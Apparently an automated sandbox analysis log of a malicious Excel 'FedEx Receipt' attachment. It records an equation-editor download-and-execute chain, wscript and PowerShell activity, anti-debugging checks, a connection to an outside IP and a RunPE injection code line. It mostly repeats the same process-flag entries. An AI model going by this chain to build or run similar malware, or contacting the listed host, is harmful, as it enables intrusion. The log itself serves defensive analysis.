            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: ima.imim.im.imim[1].doc.0.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: DD4612E1.doc.4.drJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,7_2_036407AB
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: FedEx Receipt_53065724643.xlsStream path 'MBD00023D34/Package' entropy: 7.96088183378 (max. 8.0)
            Source: FedEx Receipt_53065724643.xlsStream path 'Workbook' entropy: 7.99936801752 (max. 8.0)
            Source: ~DFE1D622D06AD63FEF.TMP.0.drStream path 'Package' entropy: 7.95091166004 (max. 8.0)
            Source: B9930000.0.drStream path 'MBD00023D34/Package' entropy: 7.95091166004 (max. 8.0)
            Source: B9930000.0.drStream path 'Workbook' entropy: 7.99916779387 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023E0101 rdtsc 12_2_023E0101
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1468Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3293Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exe TID: 3656Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3828Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023E0101 rdtsc 12_2_023E0101
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk,12_2_023907AC
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 7_2_03640805 mov edx, dword ptr fs:[00000030h]7_2_03640805
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_02380080 mov ecx, dword ptr fs:[00000030h]12_2_02380080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023800EA mov eax, dword ptr fs:[00000030h]12_2_023800EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_023A26F8 mov eax, dword ptr fs:[00000030h]12_2_023A26F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 41.216.183.13 80Jump to behavior
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR
            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&name)), ref *(string*)(&method)), typeof(CreateApi)))
